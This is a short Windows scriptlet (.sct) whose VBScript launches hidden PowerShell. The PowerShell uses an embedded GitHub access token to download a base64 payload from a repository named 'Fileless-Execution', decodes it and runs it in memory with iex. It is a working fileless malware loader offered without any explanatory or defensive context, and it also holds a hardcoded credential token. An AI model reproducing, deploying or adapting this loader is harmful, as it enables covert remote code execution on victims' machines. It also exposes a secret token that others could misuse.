<?XML version="1.0"?>
<scriptlet>
<registration progid="Run" classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
<script language="VBScript">
<![CDATA[
Set shell = CreateObject("WScript.Shell")
cmd = "powershell -nop -w hidden -c ""$token='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';iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((irm 'https://raw.githubusercontent.com/bna169/Fileless-Execution/refs/heads/main/base64.txt' -Headers @{Authorization='token '+$token}))))"" "
shell.Run cmd, 0, False
]]>
</script>
</registration>
</scriptlet>
